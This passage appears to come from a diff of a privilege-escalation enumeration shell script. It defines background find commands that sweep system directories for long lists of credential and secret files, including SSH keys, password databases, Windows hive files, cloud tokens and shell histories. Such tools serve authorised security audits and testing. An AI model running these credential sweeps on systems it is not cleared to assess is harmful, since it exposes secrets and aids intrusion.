\"database.php\" -o -name \"ssh*config\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"redis.conf\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"*.gnupg\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"redis.conf\" -o -name \"sess_*\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"neo4j\" -o -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"system.d\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"cacti\" -o -name \".vnc\" -o -name \"ldap\" -o -name \"bind\" -o -name \"sites-enabled\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \"mysql\" -o -name \".irssi\" -o -name \".svn\" -o -name \"logstash\" -o -name \"seeddms*\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name \"filezilla\" -o -name \"keyrings\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" 